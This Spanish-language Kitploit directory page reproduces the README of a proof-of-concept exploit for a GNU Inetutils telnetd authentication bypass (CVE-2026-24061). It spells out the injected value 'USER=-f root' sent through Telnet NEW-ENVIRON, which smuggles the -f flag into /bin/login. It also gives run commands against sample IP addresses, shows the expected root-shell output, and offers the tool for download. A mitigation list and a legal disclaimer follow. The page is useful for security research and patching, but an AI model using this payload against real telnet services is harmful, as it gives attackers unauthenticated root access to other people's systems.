Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — Prueba de concepto de explotación para la omisión de autenticación en telnetd de GNU Inetutils (CVE-2026-24061) que genera un shell root mediante la variable USER de NEW-ENVIRON manipulada. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónHerramienta de Acceso Remoto
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

Prueba de concepto de explotación para la omisión de autenticación en telnetd de GNU Inetutils (CVE-2026-24061) que genera un shell root mediante la variable USER de NEW-ENVIRON manipulada.

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Resumen

Este repositorio contiene un exploit de Prueba de Concepto para la vulnerabilidad de omisión de autenticación remota en GNU Inetutils telnetd.

El problema surge porque telnetd no sanea adecuadamente la variable de entorno USER recibida a través de la negociación Telnet NEW‑ENVIRON antes de invocar a /bin/login.

Al proporcionar:

root@kitploit:~
USER=-f root

telnetd ejecuta efectivamente:

root@kitploit:~
/bin/login -f root

lo que omite la autenticación y genera un shell root inmediato.

  • Producto: GNU Inetutils telnetd
  • Versiones afectadas: ≤ 2.7
  • Puerto: 23/TCP
  • Autenticación: No requerida
  • Impacto: Omisión de autenticación → Shell root
  • Privilegios: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (Crítico)

⚙️ Detalles técnicos

Telnet NEW‑ENVIRON permite a los clientes establecer variables de entorno durante la negociación de la sesión.

El telnetd vulnerable pasa USER directamente a login:

root@kitploit:~
/bin/login -f "$USER"

Un atacante establece:

root@kitploit:~
USER=-f root

Resultado:

root@kitploit:~
/bin/login -f root

La bandera -f indica a login que omita la autenticación, otorgando acceso root.


📦 Requisitos

  • Python 3
  • telnetlib (biblioteca estándar)
  • Objetivo que ejecute inetutils‑telnetd vulnerable ≤ 2.7
  • Servicio Telnet accesible en TCP/23

No se requieren dependencias externas.


🚀 Uso

1️⃣ Ejecutar el exploit

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ Puerto opcional

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ Resultado esperado

Si es vulnerable:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

Ahora tienes un shell root interactivo.


🧪 Ejemplo

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

Salida:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 Notas

  • El exploit es instantáneo
  • No requiere fuerza bruta
  • No requiere credenciales
  • Se ha observado explotado en entornos reales
  • Funciona en instalaciones predeterminadas de inetutils‑telnetd en Debian/Ubuntu
  • Falla si telnetd está parcheado o reemplazado (p. ej., OpenBSD telnetd)

🛡️ Mitigación

  • Actualizar GNU Inetutils ≥ 2.8
  • Deshabilitar el servicio telnet
  • Reemplazar por SSH
  • Bloquear TCP/23 en el firewall
  • Auditar los paquetes inetutils‑telnetd

📊 Flujo de ataque del PoC

root@kitploit:~
sequenceDiagram
    participant A as Atacante
    participant T as telnetd objetivo
    participant L as /bin/login
    participant R as Shell root

    A->>T: Conectar TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Ejecutar /bin/login -f root
    L-->>T: Omisión de autenticación exitosa
    T-->>R: Generar shell root
    R-->>A: Sesión root interactiva

⚠️ Aviso legal

Este exploit se proporciona para:

  • Investigación de seguridad
  • Pruebas de penetración autorizadas
  • Validación defensiva

El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.

Descargar herramienta